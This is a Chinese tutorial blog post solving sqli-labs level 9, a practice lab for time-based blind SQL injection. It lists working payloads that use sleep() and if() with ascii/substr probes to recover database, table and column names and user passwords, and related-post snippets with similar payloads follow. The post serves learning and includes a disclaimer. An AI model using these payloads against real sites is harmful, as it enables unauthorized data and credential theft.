sqli-labs关卡9(基于get提交的单引号闭合的时间盲注)通关思路

已于 2024-01-16 19:49:31 修改
阅读量845 收藏 14
点赞数 6
分类专栏: # sqli-labs靶场7-10关 sqli-labs靶场 文章标签: 数据库 sql web安全
于 2023-10-31 22:52:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/134149454
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾上一关知识点

上一关我们了解到什么是布尔盲注,以及怎么判断什么时候用布尔盲注。首先是看页面有没有回显,没有回显就考虑盲注,报错盲注优先选择。

布尔与时间盲注看页面报错情况,若发现注入语句正确页面正常,注入语句错误页面是类似空白页面(false)那么就用布尔盲注。若无论注入语句正确还是错误,页面均正常的话,就用时间盲注

时间盲注在这一关会详细讲解。

二、靶场第九关要用到的相关知识

  1. 什么是时间盲注?
  2. 要熟知的相关函数

1、什么是时间盲注?

时间注入的意思就是通过sleep()、if()等函数拼接数据库,通过浏览器返回页面的时间差来进行猜测数据库相关信息。

2. 要熟知的相关函数

1、if()函数
定义:如果条件为 TRUE,IF() 函数返回一个值,如果条件为 FALSE,则返回另一个值。
语法:
IF(condition, value_if_true, value_if_false)
实例:
如果条件为 TRUE,则返回 “YES”,如果条件为 FALSE,则返回 “NO”:

SELECT IF(500<1000, "YES", "NO");

2、sleep()函数
定义:让数据库执行时休眠,参数是休眠的时长,以秒为单位,也可以是小数。
用法:

 select sleep(3);

也就是延迟3秒。

三、靶场第九关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、猜数据库长度
  • 4、猜数据库名字
  • 5、猜表名长度
  • 6、猜表名名字
  • 7、猜列名长度
  • 8、猜列名名字
  • 9、猜数据长度
  • 10、猜数据名字

1.判断注入点

经过测试可知道此关卡是无论注入语句正确还是错误,页面都是正常的。所以无法通过简单的报错判断注入点,从判断注入点就要用时间盲注了。
注入语句为

id=1 and 1=1 and sleep(5)

id=1 and 1=2 and sleep(5)

如果是数字型那么页面会延迟5秒,但是发现页面并没有延迟,所以不是数字型。
注入语句为

id=1' and 1=1 and sleep(5)--+

id=1' and 1=2 and sleep(5)--+

发现1=1的时候页面延迟了,1=2的时候页面没有延迟。所以是单引号闭合。(如图所示)
在这里插入图片描述
发现页面左上角是在转圈圈的,也就是延迟了。自己可以去试一试。

2、爆字段个数

注入语句为

id=1' and sleep(5) order by 3--+

发现order by 3页面延迟了,order by4页面没有延迟。所以显位是3(如图所示)
在这里插入图片描述

3、猜数据库长度

注入语句为

id=1' and if(length(database())>7,sleep(5),1)--+

语句意思是如果数据库长度大于7,页面就会延迟5秒,反之不延迟。发现大于8的时候没有延迟,可判定数据库长度为8(如图所示)
在这里插入图片描述
在这里插入图片描述

4、猜数据库名字

这里后面的语句与上一关布尔盲注差不多,就展示关键payload,不一一展示了。不懂看上一关
注入语句为

id=1' and if(ascii(substr(database(),1,1))>114,sleep(5),1)--+

发现数据库名字第一个字符大于114时页面延迟了,大于115没有延迟。(如图所示)
在这里插入图片描述
在这里插入图片描述
得到第一个字符是s,ascii码在上一关有。其他字符也是依葫芦画瓢一个个试,得到数据库名字为security

5、猜表名长度

注入语句为

id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 3,1))>4,sleep(5),1)--+

(如图所示)发现第4个表长度大于4页面延迟,大于5页面正常,可知第4个表长5.其他表长度判断也是依葫芦画瓢,这里只演示我们要的表名的步骤,不懂看上一关。
在这里插入图片描述
在这里插入图片描述

6、猜表名名字

注入语句为

id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116,sleep(5),1)--+

得到第四个表第一个字符大于116页面延迟,大于117页面正常。得到第一个字符ascii码为17对应字符u。以此类推得到users表名(如图所示)
在这里插入图片描述
在这里插入图片描述

7、猜列名长度

注入语句为

id=1' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1))>7,sleep(5),1)--+

(如图所示)得到第二个列名长度大于7页面延迟,大于8页面正常。以此类推推出所有列名长度。(第二个和第三个列名是我们想要的)
在这里插入图片描述
在这里插入图片描述

8、猜列名名字

注入语句为

id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116,sleep(5),1)--+

(如图所示)发现第二个列名第一个字符大于116页面延迟,大于117页面正常,得到第一个字符为u。以此类推得到第二个和第三个列名为username和password
在这里插入图片描述
在这里插入图片描述

9、猜数据长度

注入语句为

id=1' and if(length((select password from users limit 0,1))>3,sleep(5),1)--+

(如图所示)这里只演示password,看到第一个密码长度大于3页面延迟,大于4页面正常。得到第一个密码长4,以此类推得到所有密码和用户名长度。
在这里插入图片描述
在这里插入图片描述

10、猜数据名字

注入语句为

id=1' and if(ascii(substr((select password from users limit 0,1),1,1))>67,sleep(5),1)--+

得到第一个密码第一个字符为D,以此类推得到所有账号和密码。(如图所示)
在这里插入图片描述
在这里插入图片描述

总结

这一关是时间盲注,与上一关布尔盲注的区别就是用到的函数更多,方法也是差不多的。布尔和时间盲注手工注入太费时间了,这里手工测试纯属是熟悉知识点,如果用工具就方便多了。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2038
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间盲注(Time-based blind)
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3401
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs第九关
qq_56726035的博客
04-08 755
sqli-labs第九关
sql-labs靶场第九关测试报告
最新发布
ccc_9wy的博客
10-06 797
sql-labs靶场第九关的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程。
sqli-labs:第九关
J_linnb的博客
05-03 1158
【代码】sqli-labs:第九关。
sqli-labs靶场第九关
gou1791241251的博客
12-26 1567
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了十秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六关的盲注,把条件换成沉睡10秒即可。 ...
SQLI-labs-第九关和第十关
weixin_54055099的博客
04-14 935
sqlilab 第9关和第10关,时间盲注
sqli-labs 9
qq_55777983的博客
07-29 434
less -9 很快啊,我们来到了第9题 掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数 所以也叫延时注入 我们惊讶的发现原本应该报错的?id=1’都是这样的回显 尝试了很多只会回显 显然这题使得布尔型盲注都无法使用 所以我们使用延时注入来判断语句的对错 ?id=1’ and sleep(5) --+ 我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒 由于我们的1’成功闭合前面–+又注释了后面 而and连接了前面正确的语句所以执行了后
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 1896
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1820
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1765
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1676
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
SQL注入之sqli-labs(九)
m0_60716947的博客
04-30 342
目录 (九)第五十四关到六十五关 (1)第五十四关 (2)第五十五关 (3)第五十六关 (4)第五十七关 (5)第五十八关 (6)第五十九关 (7)第六十关 (8)第六十一关 (9)第六十二关 (10)第六十三关 (11)第六十四关 (12)第六十五关 (十)sqli-labs 总结 (九)第五十四关到六十五关 (1)第五十四关 首页提醒我们使用id 值进行注入,并且告诉我们: 此挑战的目标是在少于 10 次尝试的情况下仅从数据库随机表中转储(“挑战”)的(密钥) 为
sqli-labs-------第八、九关
wyzhxhn的博客
11-09 288
布尔盲注时间盲注
第九关的原理方法
2401_82770182的博客
04-22 172
第九关会发现我们不管输入什么页面显示的东西都是一样的,这个时候布尔盲注就不适合我们用,布尔盲注适合页面对于错误和正确结果有不同反应。判断所有字段名的长度。
sqli-labs-master闯关游戏第九关
FourthGuy的博客
10-09 2192
文章目录前言一、Less-9分析下源码中的函数总结 前言 本题用到了在第八关介绍的两个函数 ascii()和substring(),和两个新的函数sleep(),if() 大家第一次接触后一定要反复练习,并且思考为什么要这么做 一、Less-9 惯例,我们先写以下语句 ?id=1 接着 ?id=1' ?id=1" 发现返回的资源都是上面的样子 猜想可能是关闭了报错,且无论语句正确与否返回的结果都是相同的 我们尝试基于时间的注入 这里介绍两个函数 sleep()参数写数字,此函数用于将时间延迟.
sqli-labs第九关&第十关(延时盲注)
qq_42266432的博客
08-20 1340
刚开始进入这一关时对这一关进行了常规的注入过程,并未发现有可以利用的地方,然后怎么办呢?去作弊嘛,看了看标题,第九关叫"time based-single quotes"基于时间单引号,于是乎,就去试了试时间盲注,使用单引号闭合,请求如下: http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ 然后发现这个请求延时了3S 进行到这里,就有了一套完整的思路时间盲注和之前的布尔盲注思路差不多,布尔盲注靠UI
Sqlilabs-9
KAKA的博客
07-07 508
第九关是基于时间盲注,所以这里放过程图片没啥卵用了,直接上payload 思路大致如下: count(*)得到表个数 --> 各个表长度 --> 猜测表名 count(*)得到列个数 --> 各个列长度 --> 猜测列名 得到数据的思路同上↑ 这里提供几个正确的 payload : 得到第一张表的第一个字母: http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information_
Sqli-labs less 9
weixin_34049032的博客
08-11 193
Less-9 本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。 这里用sleep()函数。 这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的) 猜测数据库: http://127.0.0.1/...
sqli-labs第九关脚本解释
01-22
sqli-labs第九关是一个延时盲注的挑战。在这个挑战中,你需要通过注入语句来判断条件是否为真,并通过延时来判断注入是否成功。 根据你提供的信息,你尝试了时间盲注的方法。你使用了单引号闭合注入语句,并在其中使用了一个延时函数`sleep(3)`来延时3秒钟。你的请求如下: ``` http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ ``` 这个注入语句的意思是,如果条件为真,那么数据库会延时3秒钟返回结果。通过观察请求的响应时间,你可以判断注入是否成功。 在第十关中,你需要使用双引号来闭合注入语句,并且要注意将字符串的双引号变成三引号,以避免闭合的双引号混入其中。 这是sqli-labs第九关的脚本解释。如果你有其他问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值